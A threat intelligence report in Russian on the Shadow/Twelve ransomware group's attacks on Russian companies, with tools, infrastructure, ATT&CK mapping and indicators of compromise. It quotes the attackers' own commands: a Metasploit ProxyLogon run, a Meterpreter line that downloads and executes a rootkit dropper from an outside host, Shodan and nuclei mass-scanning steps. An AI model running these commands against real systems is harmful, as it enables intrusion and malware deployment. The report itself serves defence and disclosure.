В начале сентября 2023 года система киберразведки F.A.C.C.T. Threat Intelligence обнаружила на сервере, который использовался неизвестными для атак на российские компании, открытую директорию с логами SQLMap, Metasploit, ProxyShell-Scanner и других доступных утилит для тестирования на проникновение.

Поскольку подобные инструменты не требуют глубоких знаний в области операционных систем, программирования или сетевых технологий, их нередко используют в атаках не очень опытные и не слишком квалифицированные злоумышленники. Тем более что использование стандартных и широко известных инструментов увеличивает вероятность обнаружения и идентификации атаки со стороны средств обнаружения и предотвращения вторжений.

В ходе дальнейшего анализа атак, техник, инструментов, сетевой и файловой инфраструктуры, изначально рассматриваемых как часть независимого кластера вредоносной активности, была установлена связь атакующих с крупной организованной преступной группой, известной как Shadow (Twelve/Comet/DARKSTAR).

Shadow — группа вымогателей, входящая в преступный синдикат ShadowTwelve. Изначально считалось, что группа Shadow начала свою активность в феврале-марте 2023 года. В августе 2023 года криминалисты F.A.C.C.T. обнаружили общие инструменты, техники, а в некоторых случаях и общую сетевую инфраструктуру и установили, что Shadow и Twelve являются частью одной группы, атакующей Россию. В сентябре 2023 года Shadow стали называть себя Comet, а недавно, в феврале 2024-го, группа снова переименовалась, но уже в DARKSTAR.

Эксперты Лаборатории цифровой криминалистики компании F.A.C.C.T. назвали Shadow группой двойного назначения, поскольку злоумышленники могут проводить как финансово, так и политически мотивированные атаки. В первом случае Shadow похищают конфиденциальные данные из инфраструктуры жертв, а затем шифруют, требуя выкуп. В политически мотивированных кампаниях от имени Twelve публикуют похищенные данные и уничтожают инфраструктуру жертвы. Не исключено, что группа выбирает, как поступить с жертвой, уже после получения доступа и закрепления.

В атаках группа использует зашифрованную версию программы-вымогателя LockBit 3.0, созданную с помощью билдера для атак на Windows, а также модифицированную версию программы-вымогателя Babuk для атак на Linux. Максимальный размер выкупа, требуемый злоумышленниками в 2023 году, составил $3,5 млн.

В ходе исследования данных с обнаруженного сервера аналитики Threat Intelligence пришли к выводу, что группировка Shadow начала атаки гораздо раньше весны 2023 года. Группа получила доступы к инфраструктуре и базам данных как минимум десятка российских компаний. Злоумышленники выбирали цели, исходя из места их расположения — в России, а не по сфере деятельности или капитализации. Перед выпуском данного исследования эксперты уведомили жертв об угрозе.

Ключевые выводы

  • В рамках данного исследования была проанализирована активность группировки Shadow за период с сентября 2022 года по август 2023 года.
  • Было выявлено, что за этот период группировка атаковала более 100 целей, из которых как минимум 10 стали жертвами.
  • Все атакованные компании находились в России и артефакты, оставленные злоумышленниками, дают понять, что атаки носят антироссийский характер.
  • Специалисты отдела Threat Intelligence компании F.A.C.C.T. идентифицировали и уведомили жертв.
  • В своих атаках злоумышленники используют ограниченный набор общедоступных инструментов с открытым исходным кодом, предназначенных для тестирования на проникновение.

Начало исследования

В сентябре 2023 года система Threat Intelligence обнаружила открытую директорию с логами и конфигурационными файлами различных инструментов для пентеста — тестирования на проникновение. В файле .bash_history, содержащем историю команд, были обнаружены команды, свидетельствующие о факте применения этого программного обеспечения против широкого списка целей, что стало причиной продолжения исследования (рис. 1).

Содержимое обнаруженной директории

Рис. 1. Содержимое обнаруженной директории

Было замечено, что публичный SSH-ключ находился на сервере злоумышленника с 25 декабря 2020 года и SSL-сертификат OpenVPN — с 25 января 2021 года. Замеченные ключ и сертификат наблюдались на сервере вплоть до предположительной блокировки в конце октября 2023-го. Данные факты указывают на то, что владелец сервера 62[.]171[.]152[.]48 не менялся в этот период времени.

Справка. Каждая пара ключей SSH является уникальной и используется для аутентификации личности пользователя или процесса, который хочет получить доступ к удаленной системе с помощью протокола SSH. Открытый (публичный) SSH-ключ нужен для проверки личности сервера клиентом, а его нахождение на сервере обычно ассоциируется с конкретным человеком или организацией, обладающими доступом к серверу (рис. 2).

Скриншот графового анализа сетевой инфраструктуры обнаруженного сервера

Рис. 2. Скриншот графового анализа сетевой инфраструктуры обнаруженного сервера

Таймлайн

Несмотря на то что владелец сервера не менялся как минимум с момента появления публичного SSH-ключа в декабре 2020 года, непосредственно вредоносная активность группы Shadow замечена на сервере в период с сентября 2022 года по август 2023 года. Используемый инструментарий и список жертв расширялись постепенно: пик развития приходится на лето (май — август) 2023 года (рис. 3).

Тепловая карта активности злоумышленника

Рис. 3. Тепловая карта активности злоумышленника

Согласно логам Metasploit установка и первый запуск датируются сентябрем 2022 года. Далее на сервере появился CrackMapExec, и уже в январе возникли первые жертвы (рис. 4). Злоумышленник использовал SQLMap — утилиту для автоматизированного поиска и эксплуатации уязвимостей веб-приложений, использующих SQL.

Хронология активности злоумышленника

Рис. 4. Хронология активности злоумышленника

Всего за период вредоносной кампании в пользовании злоумышленника были замечены следующие инструменты:

  • SQLMap,
  • Metasploit,
  • ProxyShell-Scanner,
  • DockerRegistryGrabber,
  • Cobalt Strike,
  • Athena,
  • Sliver.

К моменту обнаружения сервера в сентябре 2023 года группировка уже удалила часть следов своих атак. Поэтому аналитики составили описание методов использования только части инструментов.

Описание инструментов

Metasploit

На сервере были обнаружены следы использования Metasploit. Это платформа для тестирования на проникновение, с которой специалист может находить, эксплуатировать и подтверждать уязвимости (рис. 5).

Содержимое директории .msf4

Рис. 5. Содержимое директории .msf4

Анализ файлов показал, что Shadow использовала Metasploit для эксплуатации уязвимостей таких популярных сервисов, как Confluence, Cisco ASA, GitLab, Exchange, IIS, OpenSSL и Zimbra. Для этого были использованы следующие эксплоиты (рис. 6):

  • Atlassian Confluence Namespace OGNL Injection;
  • BIND TSIG Badtime Query Denial of Service;
  • Cisco ASA Directory Traversal;
  • GitLab GraphQL API User Enumeration;
  • Local Exploit Suggester;
  • Microsoft Exchange ProxyLogon Collector;
  • Microsoft Exchange ProxyLogon RCE;
  • Microsoft Exchange ProxyLogon Scanner;
  • Microsoft Exchange ProxyNotShell RCE;
  • Microsoft Exchange ProxyShell RCE;
  • Microsoft IIS WebDav ScStoragePathFromUrl Overflow;
  • Netlogon Weak Cryptographic Authentication;
  • Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution;
  • OpenSSL Heartbeat (Heartbleed) Information Leak;
  • Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF;
  • Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925).

Согласно истории команд, для злоумышленника характерен следующий паттерн использования Metasploit:

search proxylogon
use 1
set rhosts [REDACTED FOR PRIVACY]
set email [REDACTED FOR PRIVACY]
show options
set lhost 62[.]171[.]152[.]48
set lport 8444
run
Пример поиска и выбора сплоита в Metasploit

Рис. 6. Пример поиска и выбора сплоита в Metasploit

Анализ директории loot — собранных с целевых хостов данных, которые Metasploit хранит в базе данных, показывает, что злоумышленник использовал Metasploit в период с 15 мая по 22 августа (рис. 7).

Содержимое директории LOOT

Рис. 7. Содержимое директории loot

Похищенные данные включают:

  • Ф. И. О., электронные адреса, должности сотрудников;
  • внутренние документы компаний.

Также в директории Metasploit был обнаружен файл meterpreter_history, наличие и содержимое которого указывает на факт использования Meterpreter — модуля Metasploit, позволяющего создавать полезную нагрузку, предоставляющую интерактивную оболочку, с помощью которой злоумышленник может исследовать целевую машину и удаленно выполнять код.

Среди прочего в истории команд Meterpreter были обнаружены строки. Первая показывает факт загрузки инструмента с открытым исходным кодом SUDO_KILLER, который может быть использован для повышения привилегий в среде Linux путем злоупотребления sudo:

execute wget https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/master/SUDO_KILLERv2.4.2.sh

Этот инструмент помогает выявить неправильную конфигурацию в правилах sudo, уязвимости в используемой версии sudo — все это может быть использовано для повышения привилегий до root.

Вместе с этим в истории была замечена команда, указывающая на попытку загрузить и запустить файл ssh1200 (SHA1 96e06691a3c430aac9c43a2bb2b347dda88e4ade) — дроппер руткита Facefish. Подобная практика уже была замечена исследователями за группой Shadow.

execute "wget http://64.226.104.111/ssh1200; chmod +x ssh1200; ./ssh1200;rm -f ssh1200"

SQLMap

На сервере были обнаружены следы использования SQLMap. Это инструмент с открытым исходным кодом, который автоматизирует процесс тестирования уязвимостей, обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных (рис. 8).

Содержимое директории SQLMap

Рис. 8. Содержимое директории SQLMap

Злоумышленник в основном передавал в SQLMap в качестве параметра HTTP запрос через текстовый файл и тестируемый параметр базы данных следующим образом:

sqlmap -r request.txt -p [REDACTED FOR PRIVACY]

Директории с именами четырех компаний-жертв находились в папке SQLMap. Исследование показало, что злоумышленник получил доступ к данным как минимум одной компании (рис. 9).

Содержимое директории с логами SQLMap

Рис. 9. Содержимое директории с логами SQLMap

ProxyShell-Scanner

Злоумышленник также использовал сканер для поиска уязвимости Proxyshell RCE (CVE-2021-34423, CVE-2021-34473, CVE-2021-31207), которая затрагивает сервер Microsoft Exchange. ProxyShell-Scanner — это инструмент с открытым исходным кодом, доступный на GitHub. Замечено как минимум одно использование Proxyshell-Scanner, при котором злоумышленник работал по списку из более чем 7000 хостов, происхождение которых неизвестно (рис. 10).

Содержимое директории ProxyShell-Scanner

Рис. 10. Содержимое директории ProxyShell-Scanner

Возможный сценарий использования этого сканера включает в себя исполнение Python-скрипта shodan-query.py, осуществляющего поиск веб-панелей Outlook через Shodan API по хешу фавикона — значка вкладки в браузере. Адреса обнаруженных панелей сохраняются в отдельный файл, предоставляя злоумышленнику актуальный и пригодный для сканирования на уязвимости список.

Скрипт shodan-query.py, осуществляющий поисковой запрос к Shodan:


import requests
import shodan
requests.packages.urllib3.disable_warnings()


API_KEY=""
SEARCH_FOR="http.favicon.hash:1768726119"

f=open("url.txt","a")


api = shodan.Shodan(API_KEY)

result = api.search(SEARCH_FOR,limit=1000)


for service in result['matches']:
IP = service['ip_str']
url="https://{}".format(IP)
f.writelines(url+"\n")

Но следов использования этого скрипта обнаружено не было. Злоумышленник имел готовый список целевых IP-адресов, который поместил в файл url в формате ссылок (с приставкой https://*). После этого список адресов был просканирован с помощью утилиты nuclei по темплейту ProxyShell-Scanner. Вывод был записан в файл ex_result (рис. 11).

sudo /root/go/bin/nuclei -l url -t /home/ovpn/Proxyshell-Scanner/proxyshell.yaml > ex_result
Содержимое файла ex_result

Рис. 11. Содержимое файла ex_result

Из 7000 просканированных злоумышленником хостов уязвимыми для атаки оказались 160. Они были вытащены в файл exchange следующей командой:

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' ex_result  >exchange

С очищенными адресами группировка работала через Metasploit.

DockerRegistryGrabber

DockerRegistryGrabber — это инструмент с открытым исходном кодом, предназначенный для извлечения информации из хранилищ для Docker-образов, содержащих все необходимое для запуска приложения, включая код, библиотеки, среду и конфигурации (рис. 12).

Содержимое директории DockerRegistryGrabber

Рис. 12. Содержимое директории DockerRegistryGrabber

На сервере было обнаружено несколько каталогов с данными, полученными в результате работы приложения DockerRegistryGrabber 31 июля 2023 года, согласно метаданным.

Прочие инструменты

Помимо вышеописанного программного обеспечения также были обнаружены и другие утилиты, следов использования которых не было обнаружено, но это не означает, что они не могли быть уничтожены.

Во-первых, в корневой директории на сервере злоумышленника хранился образец Cobalt Strike — фреймворка для тестирования на проникновение, который часто используется злоумышленниками в качестве средства для проведения атак. Файл winevtx.exe (SHA1 7c113a202124ba3ca4fb39c8437789bdc69fdd8f) — beacon stager (рис. 13), который выполняет только некоторые базовые проверки и только затем запрашивает C2 для загрузки полнофункционального бэкдора (рис. 14).

Результат проверки F.A.C.C.T. Managed XDR

Рис. 13. Результат проверки F.A.C.C.T. Managed XDR

Конфигурация семпла

Рис. 14. Конфигурация семпла

На основании сетевого взаимодействия вредоносного файла аналитики обнаружили C2-домен vindowsupdt[.]ru, DNS-запись которого зарегистрирована 17 мая 2023 года (рис. 15). К сожалению, финальная полезная нагрузка была уже недоступна к моменту исследования. Стоит отметить, что домен vindowsupdt[.]ru находился под Cloudflare.

Скриншот графового анализа сетевой инфраструктуры C2-домена

Рис. 15. Скриншот графового анализа сетевой инфраструктуры C2-домена

Вместе с этим на сервере группы Shadow был обнаружен образец агента Mythic Athena с именем winevt.exe (SHA1 77ceaff8710d84069df4f2f20e37b3ed4005bc19) (рис. 16). Mythic — еще один фреймворк для тестирования на проникновение, который аналогично Cobalt Strike может использоваться злоумышленниками для проведения атак. Athena — это специализированный модуль или плагин для Mythic, который предназначен для работы в среде Windows и обеспечивает расширенные возможности выполнения команд на удаленных машинах.

Результат проверки F.A.C.C.T. Managed XDR

Рис. 16. Результат проверки F.A.C.C.T. Managed XDR

Он может выполнять разнообразные функции, включая сбор информации о системе, выполнение команд и скриптов, манипуляции с файлами и процессами, а также может использоваться для перехвата данных и наблюдения за активностью пользователя. Этот агент позволяет оператору C2 проводить взаимодействие с целевыми системами. Файл winevt.exe обращается к C2 91[.]207[.]183[.]54, который, предположительно, мог применяться злоумышленником в период с 7 июля по 8 сентября 2023 года. Система Threat Intelligence также обнаружила на нем следы использования Cobalt Strike (рис. 17, 18).

Cobalt Strike на порте 443

Рис. 17. Cobalt Strike на порте 443

Сертификат Mythic

Рис. 18. Сертификат Mythic

Скриншот графового анализа сетевой инфраструктуры C2-сервера

Рис. 19. Скриншот графового анализа сетевой инфраструктуры C2-сервера

Аналогичным образом в корневой директории исследуемого сервера hxxp://62[.]171[.]152[.]48:8000/ был найден семпл Sliver — фреймворка для тестирования на проникновения. Файл с именем resolved (SHA1 01e414085c2c21c9f971c4889e8ddbe85e4f3a65) хранился на основном сервере. Sliver взаимодействует с доменом huibudesh[.]lol, который с 6 июня 2023 года имеет A-запись 135.181.46.97.

TXT-запись домена huibudesh[.]lol

Рис. 20. TXT-запись домена huibudesh[.]lol

Скриншот графового анализа сетевой инфраструктуры C2-сервера

Рис. 21. Скриншот графового анализа сетевой инфраструктуры C2-сервера

Также на исследуемом сервере hxxp://62[.]171[.]152[.]48:8000/ были обнаружены файлы CrackMapExec (CME) — инструмента для тестирования на проникновение, разработанного для автоматизации оценки безопасности сетей Active Directory (AD). Он интегрирован с различными модулями и функциями, предназначенными для выполнения широкого спектра задач: от сканирования сетей до автоматизации эксплуатации уязвимостей и постэксплуатационных действий. Злоумышленники используют CME преимущественно с целью сбора учетных данных, повышения привилегий и перемещения по сети.

Кроме инструментов, непосредственно заточенных под атаку, были обнаружены и те, основное назначение которых не несет вреда:

  • Ngrok — это инструмент, который позволяет создавать безопасные туннели к локальным серверам за NAT и брандмауэрами, обеспечивая временный публичный доступ к приложениям, запущенным на локальном устройстве.
  • socat — инструмент для работы с данными, перенаправляемыми через сетевые сокеты. Предоставляет широкий спектр возможностей для создания различных типов соединений (TCP, UDP и др.).
  • PsExec64 — предназначен для удаленного выполнения процессов на других системах в сети.
  • XenArmor — программное обеспечение, представляющее собой набор инструментов для восстановления паролей к различным приложениям.
  • redis-cli — утилита для взаимодействия с Redis. redis-cli предоставляет интерфейс командной строки для отправки команд Redis-серверу, что позволяет управлять данными и конфигурацией целевого устройства.

Использование подобных легальных инструментов в кибератаках может быть обусловлено сниженной вероятностью обнаружения их действий средствами защиты. Так как эти приложения часто используются в законных целях, они редко попадают в черные списки, а их присутствие на устройствах или в сети само по себе не является индикатором компрометации.

Инструменты, обнаруженные на сервере, могут позволить злоумышленнику достигнуть внушительного списка целей вплоть до эксфильтрации данных. Однако стоит отметить, что если рассматривать только инструменты, следы использования которых были обнаружены, то можно сделать вывод, что активность с данного сервера была направлена преимущественно на решение задач сбора информации о целях и получении начального доступа. Подобный подход характерен для нецелевых атак, в которых предпочтителен количественный подход к выбору целей.

Инфраструктура злоумышленника

Таким образом, аналитики предполагают, что злоумышленник использовал как минимум четыре сервера и три домена. Исходя из назначения, их можно разделить на группы, перечисленные в таблице ниже.

Назначение

Замеченные инструменты

Период активности

Сервер

Домен

Основной сервер SQLMap, Metasploit и др. C сентября 2022 по сентябрь 2023 62.171.152[.]48
Инфраструктура Mythic Athena Mythic Athena + Cobalt Strike С июля по сентябрь 2023 91.207.183[.]54 stela-artua[.]xyz
Инфраструктура Cobalt Strike Cobalt Strike С мая по август 2023 vindowsupdt[.]ru
Инфраструктура Sliver Sliver С июня по август 2023 135.181.46[.]97 huibudesh[.]lol
Инфраструктура Facefish Facefish 64.226.104[.]111

 

Скриншот графового анализа сетевой инфраструктуры злоумышленника из системы F.A.C.C.T. Threat Intelligence

Рис. 21. Скриншот графового анализа сетевой инфраструктуры злоумышленников

Анализ жертв

По итогам анализа действий Shadow был выявлен четкий паттерн в выборе целей. В центре внимания атакующих оказались преимущественно малозащищенные компании из широкого спектра отраслей и сфер деятельности. Однако несмотря на эту отраслевую диверсификацию, все атакуемые организации объединяет одна общая черта: они расположены в одном и том же географическом регионе — в России.

Выводы

Из обнаруженного участия более серьезной и организованной группировки Shadow в атаках, изначально рассматриваемых как независимый кластер активности, можно сделать следующий важный вывод: хотя использование публично доступных и относительно простых в освоении инструментов часто ассоциируется с действиями злоумышленников начального уровня, такие инструменты могут также применяться более продвинутыми группировками для скрытия на фоне многочисленных «шумовых» атак, проводимых менее квалифицированными злоумышленниками, минимизации ресурсов и времени на разработку и подготовку атаки, первоначального тестирования защитных механизмов цели, позволяя оценить готовность системы к более сложным и изощренным атакам. Эти факторы подчеркивают необходимость учитывать не только продвинутые, но и базовые методы атак, а также вредоносные сценарии использования легитимных утилит.

Попробуйте Threat Intelligence от F.A.C.C.T.

Проактивный анализ киберугроз и предотвращение атак со знанием методов и инструментов атакующих

MITRE ATT&CK® Matrix

Tactic

Technique

Procedure

Reconnaissance (TA0043) Active Scanning: Scanning IP Blocks (T1595.001) Shadow сканировали IP адреса,с целью собрать информацию о жертвах.
Active Scanning: Vulnerability Scanning (T1595.002) Shadow сканировали инфраструктуру с целью собрать информацию о жертвах.
Gather Victim Host Information: Software (T1592.002) Shadow сканировали инфраструктуру с целью собрать информацию о ПО жертв.
Resource Development (TA0042) Acquire Infrastructure: Domains (T1583.001) Shadow приобретали и использовали в своих атаках домены.
Acquire Infrastructure: Server (T1583.004) Shadow приобретали и использовали в своих атаках сервера.
Acquire Infrastructure: Serverless (T1583.007) Shadow приобретали и использовали в своих атаках безсерверную инфраструктуру (Cloudflare).
Obtain Capabilities: Malware (T1588.001) Shadow использовали ВПО Facefish.
Obtain Capabilities: Tool (T1588.002) Shadow использовали такие инструменты, как Ngrok, socat, PsExec64, XenArmor.
Obtain Capabilities: Exploits (T1588.005) Shadow использовали общедоступный эксплойт для получения доступа к инфраструктуре.
Obtain Capabilities: Vulnerabilities (T1588.006) Shadow использовали несколько уязвимостей в Microsoft Exchange и Zimbra.
Stage Capabilities: Upload Malware (T1608.001) Shadow хранили на удаленном сервере и затем загружали оттуда ВПО Facefish.
Stage Capabilities: Upload Tool (T1608.002) Shadow хранили на удаленном сервере и затем загружали оттуда на устройства жертв такие инструменты, как Ngrok, socat, PsExec64, XenArmor.
Initial Access (TA0001) Exploit Public-Facing Application (T1190) Shadow использовали общедоступные инструменты и эксплоиты для получения доступа к инфраструктуре.
Valid Accounts (T1078) Shadow использовали скомпрометированные учетные данные VPN для обхода контроля доступа к различным ресурсам систем в сети и даже для постоянного доступа к удаленным системам.
Execution (TA0002) Command and Scripting Interpreter: Unix Shell (T1059.004) В истории команд Meterpreter содержатся примеры команд для загрузки и выполнения ВПО в оболочке Linux.
Command and Scripting Interpreter: Network Device CLI (T1059.008) Shadow использовала redis-cli.
Persistence (TA0003) Hijack Execution Flow: Dynamic Linker Hijacking (T1574.006) Facefish инжектится через метод LD_PRELOAD в процесс SSHD.
Valid Accounts (T1078) Shadow использовали скомпрометированные учетные данные VPN для обхода контроля доступа к различным ресурсам систем в сети и даже для постоянного доступа к удаленным системам.
Privilege-escalation (TA0004) Hijack Execution Flow: Dynamic Linker Hijacking (T1574.006) Facefish инжектится через метод LD_PRELOAD в процесс SSHD.
Abuse Elevation Control Mechanism: Sudo and Sudo Caching (T1548.003) Shadow использует инструмент SUDO_KILLER, который может быть использован для повышения привилегий в среде Linux путем злоупотребления sudo
Valid Accounts (T1078) Shadow использовали скомпрометированные учетные данные VPN для обхода контроля доступа к различным ресурсам систем в сети и даже для постоянного доступа к удаленным системам.
Defense-evasion (TA0005)
Hijack Execution Flow: Dynamic Linker Hijacking (T1574.006) Facefish инжектится через метод LD_PRELOAD в процесс SSHD.
Indicator Removal: File Deletion (T1070.004) Shadow удаляли файлы после запуска.
File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification (T1222.002) Shadow меняли права доступа при помощи chmod
Masquerading: Match Legitimate Name or Location (T1036.005) Shadow использовали файлы с именами, мимикрирующими под системные службы Windows (например, svchost.exe).
Modify Registry (T1112) Shadow использует инструменты, модифицирующие реестр
Abuse Elevation Control Mechanism: Sudo and Sudo Caching (T1548.003) Shadow использует инструмент SUDO_KILLER, который может быть использован для повышения привилегий в среде Linux путем злоупотребления sudo
Valid Accounts (T1078) Shadow использовали скомпрометированные учетные данные VPN для обхода контроля доступа к различным ресурсам систем в сети и даже для постоянного доступа к удаленным системам.
Credential Access (TA0006) Credentials from Password Stores (T1555) Shadow вытаскивала учетные данные из мест хранения паролей.
Collection (TA0009) Archive Collected Data: Archive via Utility (T1560.001) Shadow архивировала скомпрометированные данные при помощи стандартных утилит.
Data from Information Repositories: Confluence (T1213.001) Shadow собирала данные из Jira и Confluence.
Command-and-control (TA0011) Application Layer Protocol: DNS (T1071.004) Shadow использовала DNS запросы для коммуникации с C2.
Application Layer Protocol: Web Protocols (T1071.001) Shadow использовала стандартные протоколы для связи с C2.
Exfiltration (TA0010) Exfiltration Over C2 Channel (T1041) Shadow использовала инструменты, которые передавали данные по C2 каналу.

 

Индикаторы компрометации

Файлы

Cobalt Strike

7c113a202124ba3ca4fb39c8437789bdc69fdd8f winevtx.exe

Athena Windows agent (используется с Mythic C2)

77ceaff8710d84069df4f2f20e37b3ed4005bc19 winevt.exe

Ngrok

c9eea274813603cb2686ac902383352384312319 svchost.exe

socat

f1a4abd70f8e56711863f9e7ed0a4a865267ec77 socat

Sliver

01e414085c2c21c9f971c4889e8ddbe85e4f3a65 resolved

PsExec64

fd7980d3e437f28000fa815574a326e569eb548e PsExec62.exe

IP-адреса

  • 62.171.152[.]48
  • 64.226.104[.]111
  • 91.207.183[.]54
  • 135.181.46[.]97

URL

  • hxxp://62.171.152[.]48:8000/
  • hxxp://64.226.104[.]111/ssh1200

Приложения

Конфигурационный файл CrackMapExec

[CME]
workspace = default
last_used_db = smb
pwn3d_label = Pwn3d!

[BloodHound]
bh_enabled = False
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = neo4j

[Empire]
api_host = 127.0.0.1
api_port = 1337
username = empireadmin
password = Password123!

[Metasploit]
rpc_host = 127.0.0.1
rpc_port = 55552
password = abc123